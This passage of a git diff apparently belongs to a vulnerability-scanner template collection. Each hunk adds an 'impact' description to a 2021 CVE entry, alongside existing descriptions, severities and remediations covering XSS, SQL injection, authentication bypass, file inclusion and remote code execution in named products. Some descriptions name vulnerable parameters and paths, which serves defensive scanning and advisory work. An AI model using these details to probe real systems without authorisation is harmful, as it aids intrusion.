Netmask version 2.0.0 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 1c7939eb7d..ba9b613203 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext. + impact: | + An attacker can obtain the repeater's password, compromising the security of the network. remediation: | Update the firmware to the latest version or replace the vulnerable repeater with a secure alternative. reference: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index d7b3bc6058..f887144563 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -5,6 +5,8 @@ info: author: melbadry9,xelkomy severity: high description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval. + impact: | + Allows an attacker to execute arbitrary LDAP queries and potentially gain unauthorized access to sensitive information or perform unauthorized actions remediation: Upgrade to OpenAM commercial version 13.5.1 or later. reference: - https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md https://hackerone.com/reports/1278050 https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/ https://portswigger.net/research/hidden-oauth-attack-vectors diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 0fb241a132..e6e4d27e6f 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system. remediation: | Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 35f536ad0b..feade9d5d0 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -12,6 +12,8 @@ info: enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server. remediation: | Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441). reference: diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index daae5bdf0e..6bace351a0 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql). + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server. remediation: | Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29442). reference: diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index ca9ec3869e..007b4b0da7 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: medium description: Ghost CMS 4.0.0 to 4.3.2 contains a DOM cross-site scripting vulnerability. An unused endpoint added during the development of 4.0.0 allows attackers to gain access by getting logged-in users to click a link containing malicious code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: This issue has been fixed in 4.3.3. reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index bba755cc71..d977cb4beb 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + impact: | + This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the target system. remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". reference: - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index b6af5b8aab..07ff826427 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index e096903fee..c5b90c1a2e 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the disclosure of sensitive information. remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus. reference: - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 9d29bca843..9bc1759b4f 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). reference: - https://sourceforge.net/p/adminer/bugs-and-features/797/ diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 23a0794799..ae5371c675 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 728d92892d..75c7b06f9b 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SysAid Technologies 20.3.64 b14 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index db9b142c38..e5eb37b216 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d severity: critical description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 871c1ec18c..c9ca4307d3 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 33f8fb0c06..5f12240bd5 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: medium description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: | Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index d2d6df41dc..dafc2f7cfd 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. + impact: | + An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 06aabc0b86..df93c736e5 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0. reference: diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index a62c6f39a9..e256dc6d7e 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. + impact: | + This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest patch or upgrade to a version that has fixed the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 1ddff837ee..98a29f3d1e 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3. reference: diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 09fa5f6e6b..c1836363a1 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index 7ebab45652..0424188627 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2. reference: diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index b939fd561e..d40819c6cd 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 705b5f5110..1455b245ca 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -5,6 +5,8 @@ info: author: infosecsanyam severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index a185a0d543..c19030333c 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 8621e74c23..ad77cf9df4 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CHIYU BF-430, BF-431 and BF-450M TCP/IP Converter devices contain a cross-site scripting vulnerability due to a lack of sanitization of the input on the components man.cgi, if.cgi, dhcpc.cgi, and ppp.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being rendered in web pages. reference: diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index 1020a981b1..452aadd7a7 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -5,6 +5,8 @@ info: author: z3bd,pdteam severity: critical description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system. remediation: | Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 39167defda..3860ba2533 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages. reference: diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 94db35e917..453c137399 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details. remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later. reference: - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index b3062892fd..5a8b14b10f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -5,6 +5,8 @@ info: author: Ahmed Abou-Ela severity: medium description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement. remediation: | Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 40e1768bb3..fcd9220846 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: high description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server. remediation: | Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 595c3397a6..a498648843 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -5,6 +5,8 @@ info: author: gy741,dhiyaneshDk severity: medium description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682). reference: diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index 93af507b9d..156dfa117f 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router. remediation: | Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755). reference: diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 704bb29590..e13c1ecbe7 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -5,6 +5,8 @@ info: author: taielab severity: critical description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. + impact: | + Remote code execution remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation. reference: - https://cwiki.apache.org/confluence/display/WW/S2-062 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 03afede138..87e973b174 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856). reference: diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 794b9e60a8..92a9598097 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -5,6 +5,8 @@ info: author: jas37 severity: medium description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 382c44a562..2a9e6b5abb 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations." + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks. remediation: | Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030). reference: diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 6a6bb52daa..c2741a0f12 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index b6b5310dce..94968c2f78 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -5,6 +5,8 @@ info: author: gy741,pikpikcu severity: high description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index a1a4178b70..6bebaac24f 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 0806c53a60..71bfba04b1 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities. remediation: | Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index 313ca44560..71694f6b41 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -5,6 +5,8 @@ info: author: smaranchand severity: critical description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication. reference: - https://smaranchand.com.np/2022/01/organization-vendor-application-security/ diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index ef7007ade6..6da2da6462 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -6,6 +6,8 @@ info: severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 4d0cfe3507..7c2b6b05ea 100644 